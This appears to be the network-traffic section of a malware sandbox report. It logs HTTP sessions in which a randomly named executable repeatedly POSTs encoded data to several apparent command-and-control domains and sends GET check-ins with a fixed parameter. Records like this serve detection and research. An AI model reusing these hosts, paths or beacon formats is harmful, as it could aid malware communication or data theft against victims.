                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RZYk5tm00vBmFyaN7GKnAueCtyd0JwBkFi5U9ybVCjBAHH6HMDjDPavLM1ZxUAzU3/gHHtOqdEztGAqmelRMIw==
                                                set-cookie: parking_session=3b15f141-f93f-4847-8320-b14eefcb73b7; expires=Tue, 27 Aug 2024 06:15:45 GMT; path=/
                                                connection: close
                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_RZYk5tm00vBmFyaN7GKnAueCtyd0JwBkFi5U9ybVCjBAHH6HMDjDPavLM1ZxUAzU3/gHHtOqdEztGAqmelRMIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                Aug 27, 2024 08:00:45.910377026 CEST967INData Raw: 32 50 34 2f 2f 38 2f 41 41 58 2b 41 76 37 63 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77
                                                Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2IxNWYxNDEtZjkzZi00ODQ3LTgzMjAtYjE0ZWVmY2


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                41 | 192.168.11.20 | 49882 | 85.159.66.93 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:51.599246979 CEST | 835 | OUT | POST /c0kl/ HTTP/1.1
                                                Host: www.emeluzunmoda.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.emeluzunmoda.online
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.emeluzunmoda.online/c0kl/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=Nzxx265ZqDHypPP5C4f6NhtCE6xS2x70A2BbzKm61YsS5vNzxh1BwdG/NvPDMhPfme5K9tllqsfI4bVppk84msD5oBzmSbVkvDiRouMSQhnCnnxlksZV0taN4mkJB9CT2YJvGt41GIM69AhhYYM7O4eJZ8y+Ip6t02vSGcPOPx7kQf+sceSkMAw+/rtTXOZsjg==
                                                Aug 27, 2024 08:00:51.831715107 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Tue, 27 Aug 2024 06:00:51 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-08-27T06:00:56.7231680Z


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                42 | 192.168.11.20 | 49883 | 85.159.66.93 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:54.353516102 CEST | 1175 | OUT | POST /c0kl/ HTTP/1.1
                                                Host: www.emeluzunmoda.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.emeluzunmoda.online
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.emeluzunmoda.online/c0kl/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:54.578942060 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Tue, 27 Aug 2024 06:00:54 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 18
                                                X-Rate-Limit-Reset: 2024-08-27T06:00:56.7231680Z


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                43 | 192.168.11.20 | 49884 | 85.159.66.93 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:57.111351013 CEST | 2578 | OUT | POST /c0kl/ HTTP/1.1
                                                Host: www.emeluzunmoda.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.emeluzunmoda.online
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.emeluzunmoda.online/c0kl/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:00:57.807780027 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Tue, 27 Aug 2024 06:00:57 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-08-27T06:01:02.6986999Z


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                44 | 192.168.11.20 | 49885 | 85.159.66.93 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:00:59.880530119 CEST | 553 | OUT | GET /c0kl/?wXB=brv4Erb&ij60MtY=AxZR1MxN1yP04/KkfJjqNmRSK4d8g2rgChYpgYbN8LwS/ds0321h0MeEKpKCay63h/JFzZR/nOfV69IulQUTnqrvqwrwGbRyvD357dhiEinhnUxdss5AyLg= HTTP/1.1
                                                Host: www.emeluzunmoda.online
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:01:00.113989115 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.14.1
                                                Date: Tue, 27 Aug 2024 06:01:00 GMT
                                                Content-Length: 0
                                                Connection: close
                                                X-Rate-Limit-Limit: 5s
                                                X-Rate-Limit-Remaining: 19
                                                X-Rate-Limit-Reset: 2024-08-27T06:01:05.0052375Z


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                45 | 192.168.11.20 | 49886 | 176.57.64.102 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:01:05.485650063 CEST | 817 | OUT | POST /mktg/ HTTP/1.1
                                                Host: www.ayypromo.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.ayypromo.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.ayypromo.shop/mktg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=5RyFs6/ejjUoUnIudc9Gaint4FpggJYnd4MvYIT7xcrcfnUiAChQFI5IaXs8SmaBoCQxQ+hQ1EYbbSBKAHKHT4kTgcSFg1D/tEnJC7NrfK3lkpXMh00P8Kx3dBLcrU+FdDTCFi9lHx8HOrcjL5o6X2r3SWayOkC/b48KvahnsAApdF7r7/i6iOfCTjzVIs95zg==
                                                Aug 27, 2024 08:01:05.754682064 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg1_=265J2Y2ZbcJAwSS7AN9S; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:05 GMT
                                                Date: Tue, 27 Aug 2024 06:01:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 340
                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                ETag: "154-56d5bbe607fc0"
                                                Accept-Ranges: bytes
                                                X-Frame-Options: SAMEORIGIN
                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                46 | 192.168.11.20 | 49887 | 176.57.64.102 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:01:08.145081997 CEST | 1157 | OUT | POST /mktg/ HTTP/1.1
                                                Host: www.ayypromo.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.ayypromo.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.ayypromo.shop/mktg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:01:08.416161060 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg1_=zeOHFGGvHLrata6NIjUS; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:08 GMT
                                                Date: Tue, 27 Aug 2024 06:01:08 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 340
                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                ETag: "154-56d5bbe607fc0"
                                                Accept-Ranges: bytes
                                                X-Frame-Options: SAMEORIGIN
                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                47 | 192.168.11.20 | 49888 | 176.57.64.102 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:01:10.802206993 CEST | 2578 | OUT | POST /mktg/ HTTP/1.1
                                                Host: www.ayypromo.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.ayypromo.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.ayypromo.shop/mktg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:01:11.419682980 CEST | 749 | IN | HTTP/1.1 404 Not Found
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg1_=CA7302n0o7hNsgNbFqiI; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:10 GMT
                                                Date: Tue, 27 Aug 2024 06:01:11 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 340
                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                ETag: "154-56d5bbe607fc0"
                                                Accept-Ranges: bytes
                                                X-Frame-Options: SAMEORIGIN
                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                48 | 192.168.11.20 | 49889 | 176.57.64.102 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:01:13.454077005 CEST | 547 | OUT | GET /mktg/?ij60MtY=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&wXB=brv4Erb HTTP/1.1
                                                Host: www.ayypromo.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:01:13.839389086 CEST | 1147 | IN | HTTP/1.1 404 Not Found
                                                Server: ddos-guard
                                                Connection: close
                                                Set-Cookie: __ddg1_=F0QVtNqKeWjLisP5NyP2; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:13 GMT
                                                Date: Tue, 27 Aug 2024 06:01:13 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 738
                                                Last-Modified: Sun, 11 Jun 2023 21:19:31 GMT
                                                ETag: "2e2-5fde1286ba692"
                                                Accept-Ranges: bytes
                                                X-Frame-Options: SAMEORIGIN
                                                Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                49 | 192.168.11.20 | 49890 | 76.223.54.146 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:01:19.069380045 CEST | 820 | OUT | POST /gir9/ HTTP/1.1
                                                Host: www.magicface.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.magicface.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.magicface.shop/gir9/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=S73AyzcU/hBQVy7s0TEG3OW9NmDF3EVXuO0M2sui8RprgcEozyoQQjzkn+P9A2LRu5pF48DE77g7e65gUhXbJFPPNMi6o/y6qET3u5YYC/+H7BuN0Brr2YdAFYDqIp5+BliVN0HvAlVgHuSq26M3ehABUwqNi6XCib/5WXAzBMKqI60LAnxHlc8ZP1Iu+WQrEg==


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                50 | 192.168.11.20 | 49891 | 76.223.54.146 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:01:21.711556911 CEST | 1160 | OUT | POST /gir9/ HTTP/1.1
                                                Host: www.magicface.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.magicface.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.magicface.shop/gir9/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                51 | 192.168.11.20 | 49892 | 76.223.54.146 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:01:24.354347944 CEST | 2578 | OUT | POST /gir9/ HTTP/1.1
                                                Host: www.magicface.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.magicface.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.magicface.shop/gir9/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                52 | 192.168.11.20 | 49893 | 76.223.54.146 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:01:26.993096113 CEST | 548 | OUT | GET /gir9/?ij60MtY=f5fgxEQYyH9aCEvnqRNhj/uGI07axwFwhdkCg+bZ+BEtnM1/7SlBYCrjg9utQFPLrd0Y68zwkqIMf6pHdwjKMQmtDey6vcSJt3zCtqxSD+6F6gKu0jTr2I8=&wXB=brv4Erb HTTP/1.1
                                                Host: www.magicface.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:01:27.097039938 CEST | 395 | IN | HTTP/1.1 200 OK
                                                Server: openresty
                                                Date: Tue, 27 Aug 2024 06:01:27 GMT
                                                Content-Type: text/html
                                                Content-Length: 255
                                                Connection: close
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ij60MtY=f5fgxEQYyH9aCEvnqRNhj/uGI07axwFwhdkCg+bZ+BEtnM1/7SlBYCrjg9utQFPLrd0Y68zwkqIMf6pHdwjKMQmtDey6vcSJt3zCtqxSD+6F6gKu0jTr2I8=&wXB=brv4Erb"}</script></head></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                53 | 192.168.11.20 | 49895 | 199.59.243.226 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:03:07.770872116 CEST | 555 | OUT | GET /enra/?wXB=brv4Erb&ij60MtY=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1
                                                Host: www.foundation-repair.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:07.873545885 CEST | 1200 | IN | HTTP/1.1 200 OK
                                                date: Tue, 27 Aug 2024 06:03:07 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 1478
                                                x-request-id: 990435df-95d1-4a73-bba1-26f710af7ccf
                                                cache-control: no-store, max-age=0
                                                accept-ch: sec-ch-prefers-color-scheme
                                                critical-ch: sec-ch-prefers-color-scheme
                                                vary: sec-ch-prefers-color-scheme
                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Im6T6/pqCTudfemr3/Ry3QOMsMpidAGuIZS152vKDAPS35jIwkuAAyjevEKaV89FkqL+9D93AJ/s2twwhb4hMA==
                                                set-cookie: parking_session=990435df-95d1-4a73-bba1-26f710af7ccf; expires=Tue, 27 Aug 2024 06:18:07 GMT; path=/
                                                connection: close


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                54          192.168.11.20  49896        103.247.8.53    80
                                                Timestamp  Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:13.241627932 CEST  835  OUT  POST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=k3lrS/T5T2y61X7LaiTkklSLCR5hcK/FTa0nvPqklcjP7AEXDwuRsux5Q1neqBXXhEOQTMGXFa7L6QPEBMl63QV5wkKYtXAwvJZa497qnPjI1Xm2UqnE1Luj4VfTUhHkzaPrB7KFVvgdozh+gow9cTYvZSZZ14bis+lbbI3QwxhZ26FBL5CIpmDOOyueN5VwOA==
                                                Aug 27, 2024 08:03:13.760560989 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:03:13 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                55          192.168.11.20  49897        103.247.8.53    80
                                                Timestamp  Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:16.119672060 CEST  1175  OUT  POST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:16.639406919 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:03:16 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                56          192.168.11.20  49898        103.247.8.53    80
                                                Timestamp  Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:18.996213913 CEST  1289  OUT  POST /21hf/ HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.asa-malukuutara.com
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.asa-malukuutara.com/21hf/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:20.251723051 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:03:19 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
                                                Upgrade: h2,h2c
